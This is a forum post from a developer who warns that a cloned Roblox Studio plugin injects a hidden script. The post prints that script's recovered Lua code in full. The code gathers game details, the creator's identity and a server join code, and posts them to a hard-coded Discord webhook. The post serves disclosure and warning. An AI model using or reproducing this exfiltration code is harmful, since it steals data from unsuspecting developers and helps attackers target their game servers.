Hello! I apologize if this is the wrong place to be posting this, but I don’t really know where else to put this. I can’t post in Bug Reports, which was where I thought of posting this, so that’s why I’m here.
I am currently working on the building phase of a project and I wanted to add some more detail, so I installed this plugin:
It appears very high on the “Relevance” sort, which is kind of concerning because of what it does.
As I was searching through for other plugins I noticed that there were many plugins all over the place going by the same name, created by different people.
Once I had the plugin installed, I realized that it was a copy of someone else’s plugin (which there are also many many clones of). The plugin immediately requested access for script injection, which I denied. I then messed around with it and it was pretty normal. As an experiment I allowed script injection to see what it would do.
When I launched the game, my output started throwing errors:
As you can see, something was trying to call require() from the client and use the HTTPService. Completely by luck, I had HTTPService off.
The malicious script that was trying to require() something disappeared immediately, but the script trying to use HTTPService stuck around. I clicked the error to see what it was doing. The script was called Script, and it had hundreds of thousands of blank lines, presumably to hide the malicious code. The second error took me right to the bad part.
The script seems to have been gathering what data it could about the game, and then packing it into a JSON and sending it to a discord server or bot via the HTTPService. This is the code:
function owner()
if game.CreatorType == Enum.CreatorType.User then
return "User"
elseif game.CreatorType == Enum.CreatorType.Group then
return "Group"
end
end
function name()
if owner() == "User" then
local lol = game.Players:GetNameFromUserIdAsync(game.CreatorId)
return lol
elseif owner() == "Group" then
local hehe = game.GroupService:GetGroupInfoAsync(game.CreatorId).Owner
return hehe
end
end
function filtering()
if game.Workspace.FilteringEnabled == true then
return "ENABBLED"
else
if game.Workspace.FilteringEnabled == false then
return "DISABLED"
end
end
end
local placeId = game.PlaceId
local p = game.Players:GetChildren()
local l1 = "https://discord.com/api/webhooks/796814416443080734/LUsF2UA2gAbOj9vhhMtust2yV6jQOwZbEFFHxuIV8KUjL4dzhhQyxDWm5tDQ_cBjrqdT"
local PlaceId = game.PlaceId
local plrs = game.Players
local maxplayers = plrs.MaxPlayers
local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
local plr = game:GetService("Players")
local HTTP = game:GetService("HttpService")
local Data =
{
["content"] = "",
["embeds"] = {{
["title"] = "New Game Logged",
["description"] = "Game Logged: " .. "**"..GetName.Name.."**",
["type"] = "rich",
["color"]= tonumber(0xff9429),
["footer"] = {
["icon_url"] = '',
["text"] = "NovaSS | 2021."
},
["thumbnail"] = {
["url"] = "https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432&format=png",
},
["author"] = {
["name"] = "NovaSS",
["icon_url"] = ""
},
["fields"] = {
{
["name"] = "Link:",
["value"] = "https://www.roblox.com/games/"..game.PlaceId.."",
["inline"] = false
},
{
["name"] = "Creator:",
["value"] = name(),
["inline"] = false
},
{
["name"] = "**__Creator Type:__**",
["value"] = owner(),
["inline"] = false
},
{
["name"] = "**__FilteringEnabled:__**",
["value"] = filtering(),
["inline"] = false
},
{
["name"] = "**__Server Players:__**",
["value"] = #plrs:GetPlayers().."/"..game.Players.MaxPlayers,
["inline"] = false
},
{
["name"] = '**__Server Code:__**',
["value"] = "```lua\nRoblox.GameLauncher.JoinGameInstance("..game.PlaceId..","..'"'..game.JobId..'"'..")```",
["inline"] = false
}
}
}
}
}
Data = HTTP:JSONEncode(Data)
HTTP:PostAsync(l1, Data)
Again, I apologize if this is the wrong place to put this post. This is definitely dangerous though, and it’s very problematic that whoever is doing this could get their plugin to the front page of plugins.